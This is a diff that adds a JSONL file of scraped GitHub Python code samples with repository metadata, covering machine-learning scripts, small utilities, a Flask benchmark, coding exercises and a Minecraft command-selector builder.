diff --git "a/3780.jsonl" "b/3780.jsonl" new file mode 100644--- /dev/null +++ "b/3780.jsonl" @@ -0,0 +1,1572 @@ +{"seq_id":"24220166112","text":"# %%\nimport tensorflow as tf\nfrom tensorflow.keras import layers\nimport numpy as np\nimport tensorflow.keras as keras\nimport pydot\nimport matplotlib.pyplot as plt\ndef plot_fig(data):\n\tplt.figure()\n\tplt.imshow(data)\n\tplt.colorbar()\n\tplt.show()\n\ndef plot_image(i, predictions_array, true_label, img):\n predictions_array, true_label, img = predictions_array[i], true_label[i], img[i]\n plt.grid(False)\n plt.xticks([])\n plt.yticks([])\n\n plt.imshow(img, cmap=plt.cm.binary)\n\n predicted_label = np.argmax(predictions_array)\n if predicted_label == true_label:\n color = 'blue'\n else:\n color = 'red'\n\n plt.xlabel(\"{} {:2.0f}% ({})\".format(class_names[predicted_label],\n 100*np.max(predictions_array),\n class_names[true_label]),\n color=color)\n\ndef plot_value_array(i, predictions_array, true_label):\n predictions_array, true_label = predictions_array[i], true_label[i]\n plt.grid(False)\n plt.xticks([])\n plt.yticks([])\n thisplot = plt.bar(range(10), predictions_array, color=\"#777777\")\n plt.ylim([0, 1]) \n predicted_label = np.argmax(predictions_array)\n\n thisplot[predicted_label].set_color('red')\n thisplot[true_label].set_color('blue')\n\n#%%\n(train_images, train_labels), (test_images, test_labels) = keras.datasets.fashion_mnist.load_data()\n#标签\nclass_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat', \n 'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\n#转为黑白图片\ntrain_images = train_images / 255.0\ntest_images = test_images / 255.0\n# print(train_images.shape, train_labels.shape,test_images.shape, test_labels.shape)\n# (60000, 28, 28) (60000,) (10000, 28, 28) (10000,)\n# keras.utils.plot_model(model, 'mnist_model.png')\n# keras.utils.plot_model(model, 'model_info.png', show_shapes=True)\n\n#构建模型\ndef train_model(ep):\n\tmodel = keras.Sequential(\n[\n layers.Flatten(input_shape=[28, 28]),\n layers.Dense(128, activation='relu'),\n layers.Dense(10, activation='sigmoid')\n])\n\tmodel.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n\tmodel.fit(train_images, train_labels, \n epochs=ep)\n\treturn model \nmodel1 = train_model(5)\npredictions = model.predict(test_images)\n\n#%%\n#监测损失/精度\n\n\n#%%\n# history = model.fit(train_images, train_labels, \n# epochs=5,\n# validation_data=(test_images,test_labels))\nprint('test loss:', test_scores[0])\nprint('test acc:', test_scores[1])\nplt.grid()\n#loss图 \nplt.plot(history.epoch, history.history.get('loss'),label='loss')\nplt.plot(history.epoch, history.history.get('val_loss'),label='val_loss')\nplt.legend()\n#accuracy图\nplt.plot(history.epoch, history.history.get('accuracy'),label='accuracy')\nplt.plot(history.epoch, history.history.get('val_accuracy'),label='val_accuracy')\nplt.legend()\n\n#%%\n#可视化结果\n# 可视化结果\nnum_rows = 5\nnum_cols = 3\nnum_images = num_rows*num_cols\nplt.figure(figsize=(2*2*num_cols, 2*num_rows))\nfor i in range(num_images):\n plt.subplot(num_rows, 2*num_cols, 2*i+1)\n plot_image(i, predictions, test_labels, test_images)\n plt.subplot(num_rows, 2*num_cols, 2*i+2)\n plot_value_array(i, predictions, test_labels)\nplt.show()\n\n\n","repo_name":"Alicewangggg/helloworld","sub_path":"TensorFlow_EX/minist.py","file_name":"minist.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32521242581","text":"from 
fast_rcnn.config import cfg\nfrom nms.gpu_nms import gpu_nms\nfrom nms.cpu_nms import cpu_nms\n\ndef nms(dets, thresh, force_cpu=False):\n \"\"\"Dispatch to either CPU or GPU NMS implementations.\"\"\"\n\n if dets.shape[0] == 0:\n return []\n if cfg.USE_GPU_NMS and not force_cpu:\n return gpu_nms(dets, thresh, device_id=cfg.GPU_ID)\n else:\n return cpu_nms(dets, thresh)\n","repo_name":"rbgirshick/py-faster-rcnn","sub_path":"lib/fast_rcnn/nms_wrapper.py","file_name":"nms_wrapper.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":7993,"dataset":"github-code","pt":"32"} +{"seq_id":"1990877760","text":"import gatt\n\nfrom argparse import ArgumentParser\n\nclass AnyDevice(gatt.Device):\n def services_resolved(self):\n super().services_resolved()\n\n device_information_service = next(\n s for s in self.services\n if s.uuid == '0000180a-0000-1000-8000-00805f9b34fb')\n\n firmware_version_characteristic = next(\n c for c in device_information_service.characteristics\n if c.uuid == '00002a26-0000-1000-8000-00805f9b34fb')\n\n firmware_version_characteristic.read_value()\n\n def characteristic_value_updated(self, characteristic, value):\n print(\"Firmware version:\", value.decode(\"utf-8\"))\n\n\narg_parser = ArgumentParser(description=\"GATT Read Firmware Version Demo\")\narg_parser.add_argument('mac_address', help=\"MAC address of device to connect\")\nargs = arg_parser.parse_args()\n\nmanager = gatt.DeviceManager(adapter_name='hci0')\n\ndevice = AnyDevice(manager=manager, mac_address=args.mac_address)\ndevice.connect()\n\nmanager.run()\n","repo_name":"getsenic/gatt-python","sub_path":"examples/read_firmware_version.py","file_name":"read_firmware_version.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":297,"dataset":"github-code","pt":"32"} +{"seq_id":"35434692893","text":"import argparse\nimport csv\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as opt\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\n\nfrom dataset import MyDataset\nfrom torchvision import models\n\n\ndef main(args):\n np.random.seed(12345)\n torch.manual_seed(12345)\n torch.cuda.manual_seed_all(12345)\n\n model = models.vgg16(pretrained=True)\n model.classifier[0] = nn.Linear(8*8*512, 4096)\n model.classifier[6] = nn.Linear(4096, 27)\n model.load_state_dict(torch.load(\"model.pth\"))\n \n dataset_test = MyDataset(args.pickle_path, args.test_list_path, args.test_dir)\n test_loader = DataLoader(dataset_test, batch_size=args.batch_size, shuffle=False)\n \n device = torch.device(\"cpu\" if args.no_cuda else \"cuda:0\")\n model = model.to(device)\n \n model.eval()\n correct = 0\n with open(args.result_path, 'w') as f:\n writer = csv.writer(f)\n with torch.no_grad():\n for data in tqdm(test_loader):\n x, y = data\n x = x.to(device)\n y = y.to(device)\n out = model(x)\n _, pred = torch.max(out.data, 1)\n result = torch.stack((y, pred), dim=1).cpu().numpy()\n writer.writerows(result)\n correct += (y == pred).sum().item()\n\n # loss = batch_loss/len(test_loader)\n accuracy = correct / len(test_loader.dataset)\n print(accuracy)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--test_list_path\", required=True, help=\"location of test files list\")\n parser.add_argument(\"--test_dir\", required=True, help=\"location of test files directory\")\n parser.add_argument(\"--pickle_path\", required=True, help=\"location of pickle file\")\n 
parser.add_argument(\"--batch_size\", type=int, default=50, help=\"batch size\")\n parser.add_argument(\"--result_path\", default=\"./result.csv\", help=\"output location\")\n\n parser.add_argument(\"--model_path\", required=True, help=\"location of saved weight\")\n parser.add_argument(\"--optimizer_path\", default=\"opt.pth\", help=\"parameters updated every epoch\")\n parser.add_argument(\"--no-cuda\", action=\"store_true\", help=\"disable GPU\")\n parser.add_argument(\"--num_workers\", type=int, default=1, help=\"number of threads for dataloader\")\n\n args = parser.parse_args()\n\n main(args)\n","repo_name":"hideki-kaneko/TGN","sub_path":"infer.py","file_name":"infer.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5292201783","text":"import random\nword=\"music\"\n\n#function name: scramble_word()\n# arguments:word\ndef scramble_word(word):\n #make the string a list so that you can use the index\n split=list(word)\n #remove the first and last letters of the word so that they are not scrambled\n first_letter=split[0]\n last_letter=split[-1]\n #same the rest of the letters in a variable\n shuffle_letters=split[0:-1]\n #shuffle the rest of the letters left\n random.shuffle(shuffle_letters)\n #put the word back together\n shuffle_letters.insert(0,first_letter)\n shuffle_letters.append(last_letter)\n final=\"\".join(shuffle_letters)\n print(final)\nscramble_word(word)\n\n \n\nsentence=\"The tree threw three tanks today.\"\n#function name: scramble_phrase\n# argument:sentence\n# purpose:scramble the phrase, use string.split()\n# return:the scrambled phrase\ndef scramble_phrase(sentence):\n sentence.split(\"t\")\n ","repo_name":"lilianaperezdiaz/cspp10","sub_path":"unit5/Lperez_scramble.py","file_name":"Lperez_scramble.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38588941164","text":"from PIL import Image\nimport numpy as np\nfrom os import listdir\nfrom os.path import isfile, join\n\nmypath = r\"C:\\Users\\admin\\PycharmProjects\\FireEmblemClone\\Resources\\Images\\Atlas Files\"\nsavepath = r\"C:\\Users\\admin\\PycharmProjects\\FireEmblemClone\\Resources\\Images\\Cropped Atlas Files\"\nimagefiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]\n\nimagefile = (r\"C:\\Users\\admin\\PycharmProjects\\FireEmblemClone\\Resources\\Images\\Common_Window.png\")\n\n\ndef singleton(image, top, left, bottom, right):\n original = Image.open(image)\n\n width, height = original.size # Get dimensions\n left = left\n top = top\n right = right\n bottom = bottom\n cropped_example = original.crop((left, top, right, bottom))\n\n cropped_example.save(join(savepath) + r\"\\Test.png\", \"PNG\")\n print(\"Singleton Complete\")\n\n\n# singleton(imagefile, 0, 0, 375, 1483)\n\ndef multiImage():\n for i in imagefiles:\n image = Image.open(join(mypath, i))\n image.load()\n\n image_data = np.asarray(image)\n image_data_bw = image_data.max(axis=2)\n non_empty_columns = np.where(image_data_bw.max(axis=0) > 0)[0]\n non_empty_rows = np.where(image_data_bw.max(axis=1) > 0)[0]\n cropBox = (min(non_empty_rows), max(non_empty_rows), min(non_empty_columns), max(non_empty_columns))\n\n image_data_new = image_data[cropBox[0]:cropBox[1] + 1, cropBox[2]:cropBox[3] + 1, :]\n\n new_image = Image.fromarray(image_data_new)\n new_image.save(join(savepath + r\"\\Cropped_\" + i))\n\n\nmultiImage()\n\nprint(\"Task 
complete\")\n","repo_name":"WhisperingShadows/FireEmblemClone","sub_path":"Tools/CroppedAtlasGenerator.py","file_name":"CroppedAtlasGenerator.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"15859293900","text":"#!/usr/bin/env python\nimport matplotlib.pyplot as plot\nimport seaborn\nimport time\n\nfrom assignment4.numba_integrator import numba_integrate\nfrom assignment4.numpy_integrator import numpy_integrate\n\n\ndef integrate(fn, a, b, n):\n if n <= 0:\n raise ValueError\n h = float(b - a) / n\n s = 0\n for i in range(n):\n s += fn(a + i * h) * h\n return s\n\n\ndef midpoint_integrate(fn, a, b, n):\n if n <= 0:\n raise ValueError\n h = float(b - a) / n\n s = 0\n for i in range(n):\n s += h*fn(a + h/2 + i*h)\n return s\n\n\ndef f(x):\n return x ** 2\n\n\ndef plottus(x, y):\n plot.yscale(\"log\")\n plot.title(\"Error as a function of N\")\n plot.xlabel(\"N\")\n plot.ylabel(\"Error\")\n plot.plot(x, y, \"b-o\")\n plot.show()\n\n\nif __name__ == '__main__':\n pn = []\n pe = []\n for n in [10, 100, 1000, 10000, 100000, 500000, 1000000]:\n pn.append(n)\n k = integrate(f, 0, 1, n)\n pe.append(1/3 - k)\n print(\"N {} K {} E {}\".format(n, k, pe[len(pe) - 1]))\n\n plottus(pn, pe)\n\n start = time.time()\n k = integrate(f, 0, 1, 100000000)\n elapsed = (time.time() - start)\n print(\"Result {} time took {}\".format(k, elapsed))\n start = time.time()\n k = numpy_integrate(f, 0, 1, 100000000)\n elapsed = (time.time() - start)\n print(\"Result {} time took with numpy {}\".format(k, elapsed))\n start = time.time()\n k = numba_integrate(f, 0, 1, 100000000)\n elapsed = (time.time() - start)\n print(\"Result {} time took with numba {}\".format(k, elapsed))\n","repo_name":"goudbes/UiO","sub_path":"INF3331/assignment-4/integrator.py","file_name":"integrator.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32570324406","text":"import datetime\r\n\r\nbalance = 1000\r\naccount_log = []\r\n\r\ndef validate(func):\r\n def wrapper(*args,**kwargs):\r\n amount =str(args[0])\r\n index = amount.index(\".\")\r\n if len(amount) - index - 1 > 2 :\r\n print(\"输入格式有误,小数点后面最多保留2位\")\r\n else:\r\n func(*args,**kwargs)\r\n return wrapper\r\n\r\n@validate\r\ndef deposit(amount):\r\n \"\"\"\r\n 存款\r\n :param amount:存入金额\r\n :return:noun\r\n \"\"\"\r\n global balance\r\n balance += amount\r\n write_log(amount,\"存入\")\r\n\r\n@validate\r\ndef withdraw(amount):\r\n \"\"\"\r\n 取款\r\n :param amount: 金额\r\n :return:\r\n \"\"\"\r\n global balance\r\n if balance < amount:\r\n print(f\"余额不足\")\r\n else:\r\n balance-=amount\r\n write_log(amount,\"取出\")\r\n\r\ndef write_log(amount,type):\r\n \"\"\"\r\n 写入日志\r\n :param amount: 金额\r\n :param type:存入 或者 取出\r\n :return:Noun\r\n \"\"\"\r\n now = datetime.datetime.now()\r\n creat_time = now.strftime(\"%y-%m-%d %H:%M:%S\")\r\n data = [creat_time,type,amount,f\"{balance:.2f}\"]\r\n account_log.append(data)\r\n\r\ndef print_log():\r\n \"\"\"\r\n 查看流水\r\n :return:Noun\r\n \"\"\"\r\n print(account_log)\r\n\r\ndef show_menu():\r\n menu = \"\"\"\r\n操作菜单\r\n0:退出\r\n1:存款\r\n2:取款\r\n3:打印交易信息\r\n \"\"\"\r\n print(menu)\r\n\r\nwhile True:\r\n show_menu()\r\n num = int(input(\"请根据菜单编号输入: \"))\r\n if num == 0:\r\n print(\"您已经退出系统\")\r\n break\r\n elif num == 1:\r\n print(\"存款\")\r\n amount = float(input(\"请输入存款���额:\"))\r\n deposit(amount)\r\n print(f\"当前余额{balance:.2f}\")\r\n elif num == 2:\r\n 
print (\"取款\")\r\n amount = float(input(\"请输入取款金额:\"))\r\n withdraw(amount)\r\n print(f\"当前余额{balance:.2f}\")\r\n elif num == 3:\r\n print(\"查看记录\")\r\n print_log()\r\n else:\r\n print(\"输入有误\")\r\n\r\n","repo_name":"code-long-cpu/Python_SelfStudy","sub_path":"comprehension_practice.py","file_name":"comprehension_practice.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1066647645","text":"n = int(input())\r\ndict = {}\r\n\r\nfor i in range(1, n+1):\r\n data = input().split(' ')\r\n dict[data[0]] = data[1]\r\n\r\na = input()\r\nwhile a:\r\n if a in dict:\r\n print(a + '=' + dict.get(a))\r\n else:\r\n print('Not found')\r\n try:\r\n a = input()\r\n except:\r\n a = False\r\n\r\n\r\n\r\n","repo_name":"ajGingrich/hackerrank-algorithms","sub_path":"30-days-of-code/day-8-dictionary-and-maps/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"35886973352","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\nimport os\nimport time\nimport math\n\nfrom flask import Flask, jsonify, request\n\napp = Flask(__name__)\napp.debug = False\n\n\ndef prime(max):\n table = [False] * max\n i_max = int(math.sqrt(max)) + 2\n\n if max < 3:\n return -1\n\n # init table\n table[0] = table[1] = True # 0 & 1 is not prime number\n\n # make table\n for i in range(2, i_max):\n if not table[i]:\n for j in range(i + i, max, i):\n table[j] = True\n\n # search\n for i in reversed(range(0, max - 1)):\n if not table[i]:\n return i\n\n return -1\n\n\n\n@app.route('/benchmark/simple')\ndef simple():\n result = {\n 'ok': True,\n 'language': 'Python',\n 'framework': 'Flask',\n 'now': int(time.clock()),\n }\n return jsonify(result)\n\n\n@app.route('/benchmark/cpu')\ndef cpu():\n max = int(request.args.get('max'))\n\n result = {\n 'ok': True,\n 'max': max,\n 'result': prime(max),\n }\n return jsonify(result)\n\n\n\nif __name__ == '__main__':\n app.run(port = int(os.environ['PORT']))\n\n# vim: se et ts=8 sw=4 sts=4 ft=python :\n","repo_name":"pine/waf_benchmark","sub_path":"python_flask_sample/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"633807814","text":"from itertools import combinations\nimport sys\n\ndef calc_dist(chicken, house):\n c_x, c_y = chicken\n h_x, h_y = house\n return abs(c_x-h_x)+abs(c_y-h_y)\n\nN, M = map(int, input().split())\nm = []\nhouse = []\nchicken = []\nc_distance = {}\nanswer = sys.maxsize\n\nfor i in range(N):\n tmp = []\n for j, c in enumerate(map(int, input().split())):\n if c == 1:\n house.append((i, j))\n if c == 2:\n chicken.append((i, j))\n tmp.append(c)\n m.append(tmp)\n\nfor d in range(1, M+1):\n for comb in combinations(chicken, d):\n c_d = 0\n for h in house:\n c_d += min(map(lambda x: calc_dist(h, x), comb))\n answer = min(answer, c_d)\nprint(answer)","repo_name":"Isaac-Lee/BOJ-Algorithm","sub_path":"Python_Solutions/15686.py","file_name":"15686.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"3920081197","text":"import numpy as np\n\nfrom cs231n.layers import *\nfrom cs231n.fast_layers import *\nfrom cs231n.layer_utils import *\n\n\nclass MyCifar10Model(object):\n \"\"\"\n A convolutional network with the 
following architecture:\n \n [conv - BN - relu - 2x2 max pool]x3 - affine - BN - relu - affine - softmax\n \n The network operates on minibatches of data that have shape (N, C, H, W)\n consisting of N images, each with height H and width W and with C input\n channels.\n \"\"\"\n \n def __init__(self, input_dim=(3, 32, 32), num_filters=(64,32,32), filter_size=(3,3,3),\n hidden_dim=100, num_classes=10, weight_scale=1e-3, reg=0.0,\n dtype=np.float32):\n \"\"\"\n Initialize a new network.\n \n Inputs:\n - input_dim: Tuple (C, H, W) giving size of input data\n - num_filters: Number of filters to use in the convolutional layer\n - filter_size: Size of filters to use in the convolutional layer\n - hidden_dim: Number of units to use in the fully-connected hidden layer\n - num_classes: Number of scores to produce from the final affine layer.\n - weight_scale: Scalar giving standard deviation for random initialization\n of weights.\n - reg: Scalar giving L2 regularization strength\n - dtype: numpy datatype to use for computation.\n \"\"\"\n self.params = {}\n self.reg = reg\n self.dtype = dtype\n \n self.bn_param1 = {'mode': 'train'}\n self.bn_param2 = {'mode': 'train'}\n self.bn_param3 = {'mode': 'train'}\n self.bn_param4 = {'mode': 'train'}\n \n C, H, W = input_dim\n self.params['W1'] = weight_scale * np.random.randn(num_filters[0], C, filter_size[0], filter_size[0])\n self.params['W2'] = weight_scale * np.random.randn(num_filters[1], num_filters[0], filter_size[1], filter_size[1])\n self.params['W3'] = weight_scale * np.random.randn(num_filters[2], num_filters[1], filter_size[2], filter_size[2])\n self.params['W4'] = weight_scale * np.random.randn(num_filters[2]*(H/8)*(W/8), hidden_dim)\n self.params['W5'] = weight_scale * np.random.randn(hidden_dim, num_classes)\n self.params['b1'] = np.zeros((num_filters[0],))\n self.params['b2'] = np.zeros((num_filters[1],))\n self.params['b3'] = np.zeros((num_filters[2],))\n self.params['b4'] = np.zeros((hidden_dim,))\n self.params['b5'] = np.zeros((num_classes,))\n self.params['gamma1'], self.params['beta1'] = np.ones((num_filters[0],)), np.zeros((num_filters[0],))\n self.params['gamma2'], self.params['beta2'] = np.ones((num_filters[1],)), np.zeros((num_filters[1],))\n self.params['gamma3'], self.params['beta3'] = np.ones((num_filters[2],)), np.zeros((num_filters[2],))\n self.params['gamma4'], self.params['beta4'] = np.ones((hidden_dim,)), np.zeros((hidden_dim,))\n\n for k, v in self.params.iteritems():\n self.params[k] = v.astype(dtype)\n \n \n def loss(self, X, y=None):\n \"\"\"\n Evaluate loss and gradient for the three-layer convolutional network.\n \n Input / output: Same API as TwoLayerNet in fc_net.py.\n \"\"\"\n \n mode = 'test' if y is None else 'train'\n self.bn_param1['mode'], self.bn_param2['mode'] = mode, mode\n self.bn_param3['mode'], self.bn_param4['mode'] = mode, mode\n \n W1, b1, gamma1, beta1 = self.params['W1'], self.params['b1'], self.params['gamma1'], self.params['beta1']\n W2, b2, gamma2, beta2 = self.params['W2'], self.params['b2'], self.params['gamma2'], self.params['beta2']\n W3, b3, gamma3, beta3 = self.params['W3'], self.params['b3'], self.params['gamma3'], self.params['beta3']\n W4, b4, gamma4, beta4 = self.params['W4'], self.params['b4'], self.params['gamma4'], self.params['beta4']\n W5, b5 = self.params['W5'], self.params['b5']\n \n # pass conv_param to the forward pass for the convolutional layer\n conv_param1 = {'stride': 1, 'pad': (W1.shape[2] - 1) / 2}\n conv_param2 = {'stride': 1, 'pad': (W2.shape[2] - 1) / 2}\n conv_param3 
= {'stride': 1, 'pad': (W3.shape[2] - 1) / 2}\n\n # pass pool_param to the forward pass for the max-pooling layer\n pool_param = {'pool_height': 2, 'pool_width': 2, 'stride': 2}\n\n scores = X\n scores, cache1 = conv_bn_relu_pool_forward(scores, W1, b1, gamma1, beta1, conv_param1, self.bn_param1, pool_param)\n scores, cache2 = conv_bn_relu_pool_forward(scores, W2, b2, gamma2, beta2, conv_param2, self.bn_param2, pool_param)\n scores, cache3 = conv_bn_relu_pool_forward(scores, W3, b3, gamma3, beta3, conv_param3, self.bn_param3, pool_param)\n scores, cache4 = affine_bn_relu_forward(scores, W4, b4, gamma4, beta4, self.bn_param4)\n scores, cache5 = affine_forward(scores, W5, b5)\n \n if y is None:\n return scores\n \n loss, grads = 0, {}\n \n loss, ds = softmax_loss(scores, y)\n ds, dW5, db5 = affine_backward(ds, cache5)\n ds, dW4, db4, dgamma4, dbeta4 = affine_bn_relu_backward(ds, cache4)\n ds, dW3, db3, dgamma3, dbeta3 = conv_bn_relu_pool_backward(ds, cache3)\n ds, dW2, db2, dgamma2, dbeta2 = conv_bn_relu_pool_backward(ds, cache2)\n dx, dW1, db1, dgamma1, dbeta1 = conv_bn_relu_pool_backward(ds, cache1)\n loss += 0.5 * self.reg * sum([np.sum(w*w) for w in [W1, W2, W3, W4, W5, b1, b2, b3, b4, b5, gamma1, gamma2, gamma3, gamma4, beta1, beta2, beta3, beta4]])\n grads = {\n 'W1': dW1 + self.reg * np.sum(W1),\n 'W2': dW2 + self.reg * np.sum(W2),\n 'W3': dW3 + self.reg * np.sum(W3),\n 'W4': dW4 + self.reg * np.sum(W4),\n 'W5': dW5 + self.reg * np.sum(W5),\n 'b1': db1 + self.reg * np.sum(b1),\n 'b2': db2 + self.reg * np.sum(b2),\n 'b3': db3 + self.reg * np.sum(b3),\n 'b4': db4 + self.reg * np.sum(b4),\n 'b5': db5 + self.reg * np.sum(b5),\n 'gamma1': dgamma1 + self.reg * np.sum(gamma1),\n 'gamma2': dgamma2 + self.reg * np.sum(gamma2),\n 'gamma3': dgamma3 + self.reg * np.sum(gamma3),\n 'gamma4': dgamma4 + self.reg * np.sum(gamma4),\n 'beta1': beta1 + self.reg * np.sum(beta1),\n 'beta2': beta2 + self.reg * np.sum(beta2),\n 'beta3': beta3 + self.reg * np.sum(beta3),\n 'beta4': beta4 + self.reg * np.sum(beta4)}\n ############################################################################\n # END OF YOUR CODE #\n ############################################################################\n \n return loss, grads\n","repo_name":"kamikat/cs231n","sub_path":"assignment2/cs231n/classifiers/convnet.py","file_name":"convnet.py","file_ext":"py","file_size_in_byte":6296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"44044750657","text":"\"\"\"\n@ARTHUR:rkp\n\"\"\"\nfrom sqliteorm.sqlite_base import SqliteClient,sqlite\n\nclass SqliteBackendBase():\n \"\"\"not implemented\"\"\"\n def __init__(\n self,\n db_path=None,\n ) -> None:\n self.db_path = db_path\n\n @property\n def get_db(self):\n if self.db_path:\n db = SqliteClient(db_path=self.db_path,conn=None)\n else:\n db = sqlite\n return db","repo_name":"hvo7mdq/sqlite_orm","sub_path":"sqliteorm/sqlite_backend.py","file_name":"sqlite_backend.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3522265074","text":"from project_template.datamodels import common_utils\n\n\nclass Position(common_utils.IterableEnum):\n GENERAL_SECRETARY = \"Secretar General\"\n DEPUTY = \"Deputat\"\n SENATOR = \"Senator\"\n MEMBER_OF_PARLIAMENT = \"Parlamentar\"\n PRIME_MINISTER = \"Prim Ministru\"\n VICE_PRIME_MINISTER = \"Vice Prim Ministru\"\n MINISTER = \"Minister\"\n DEPUTY_CHAMBER_PRESIDENT = \"Presedinte Camera 
Deputatilor\"\n SENATE_PRESIDENT = \"Presedinte Senat\"\n PRESIDENT = \"Presedinte\"\n COUNSELOR = \"Consilier\"\n STATE_SECRETARY = \"Secretar de Stat\"\n OTHER = \"Alta Valoare\"\n","repo_name":"code4romania/asset-declarations","sub_path":"project_template/datamodels/position.py","file_name":"position.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"32"} +{"seq_id":"2795268458","text":"from typing import Union\n\nfrom nbtlib.tag import Compound\n\nfrom onyx.class_types import Buildable\nfrom onyx.dev_util import (dict_to_advancement_selector,\n dict_to_score_selector, translate)\nfrom onyx.registries import entity_sort, gamemode, selector_type\nfrom onyx.util import Range\n\n\nclass Selector(Buildable):\n \"\"\"\n Selector - Represents a selector\n\n Args:\n type (selector_type, optional): The type of selector (``@e``, ``@s`, etc.). Defaults to selector_type.all_entities.\n advancements (dict, optional): The advancements of the entity. Defaults to None.\n distance (Union[int, Range], optional): The distance of the entity from a certain point. Defaults to None.\n dx (int, optional): How far away the entity can be from ``x`` in the positive X-axis. Defaults to None.\n dy (int, optional): How far away the entity can be from ``y`` in the positive Y-axis. Defaults to None.\n dz (int, optional): How far away the entity can be from ``z`` in the positive Z-axis. Defaults to None.\n gamemode (gamemode, optional): The gamemode of the entity. Defaults to None.\n level (int, optional): The experience points the entity must have. Defaults to None.\n limit (int, optional): The amount of entities that can be selected. Defaults to None.\n name (str, optional): The name of the entity. Defaults to None.\n nbt (Compound, optional): The NBT of the entity. Defaults to None.\n predicate (Union[str, list], optional): The predicates that must apply to the entity. Defaults to None.\n scores (dict, optional): The scores of the entity. Should be given as a dictionary with the keys being the objectives and the values being the values. Defaults to None.\n sort (entity_sort, optional): How the entities will be sorted if multiple are selected. Defaults to None.\n tag (Union[str, list], optional): The tags of the entity. If this is a list, then multiple ``tag`` entries will be created in the selector. Example: ``tag=[\"tag1\", \"tag2\"]`` => ``tag=tag1, tag=2``. Defaults to None.\n team (Union[str, list], optional): The team of the entity. If this is a list, then multiple ``team`` entries will be created in the selector. Example: ``team=[\"team1\", \"team2\"]`` => ``team=team1, team=team2``. However, this selector will always fail, since an entity can only be on one team. As such, a list should only be specified if you're negating multiple teams. Defaults to None.\n x (int, optional): The point on the X-axis of the entity. Defaults to None.\n y (int, optional): The point on the Y-axis of the entity. Defaults to None.\n z (int, optional): The point on the Z-axis of the entity. Defaults to None.\n x_rotation (Union[int, Range], optional): The rotation of the entity on the X-axis (vertical). Defaults to None.\n y_rotation (Union[int, Range], optional): The rotation of the entity on the Y-axis (horizontal). 
Defaults to None.\n \"\"\"\n def __init__(self, type: selector_type = selector_type.all_entities, advancements: dict = None, \n distance: Union[int, Range] = None, dx: int = None, dy: int = None, dz: int = None, \n gamemode: gamemode = None, level: int = None, limit: int = None, name: str = None,\n nbt: Compound = None, predicate: Union[str, list] = None, scores: dict = None,\n sort: entity_sort = None, tag: Union[str, list] = None, team: Union[str, list] = None,\n x: int = None, y: int = None, z: int = None, x_rotation: Union[int, Range] = None,\n y_rotation: Union[int, Range] = None) -> None:\n\n self.type = type\n self.advancements = advancements\n self.distance = distance\n self.dx = dx\n self.dy = dy\n self.dz = dz\n self.gamemode = gamemode\n self.level = level\n self.limit = limit\n self.name = name\n self.nbt = nbt\n self.predicate = predicate\n self.scores = scores\n self.sort = sort\n self.tag = tag\n self.team = team\n self.x = x\n self.y = y\n self.z = z\n self.x_rotation = x_rotation\n\n\n def build(self) -> str:\n \"\"\"\n build - Returns the built selector\n\n Returns:\n str: The built selector\n \"\"\"\n advancements, name, scores = None, None, None\n\n if self.advancements:\n advancements = dict_to_advancement_selector(self.advancements)\n\n if self.name:\n name = f\"'{self.name}'\"\n\n if self.scores:\n scores = dict_to_score_selector(self.scores)\n\n output = []\n for key, item in vars(self).items():\n if item and key != \"type\":\n if key in {\"gamemode\", \"level\", \"name\", \"tag\", \"team\", \"predicate\"} and isinstance(item, list):\n for arg in item:\n output.append(f\"{translate(key)}={translate(arg)}\")\n # This awful special case needs to exist because overwriting the class attributes makes building the selector more than once error out, and copying, overwriting, appending to output, and rewriting the copy back to the class attribute is even worse\n elif key == \"advancements\" and advancements:\n output.append(f\"{translate(key)}={translate(advancements)}\")\n elif key == \"name\" and name:\n output.append(f\"{translate(key)}={translate(name)}\")\n elif key == \"scores\" and scores:\n output.append(f\"{translate(key)}={translate(scores)}\")\n else:\n output.append(f\"{translate(key)}={translate(item)}\")\n\n if output:\n return f\"{translate(self.type)}[{', '.join(output)}]\"\n else:\n return translate(self.type)\n","repo_name":"DoubleF3lix/onyx","sub_path":"onyx/selector.py","file_name":"selector.py","file_ext":"py","file_size_in_byte":5900,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"32"} 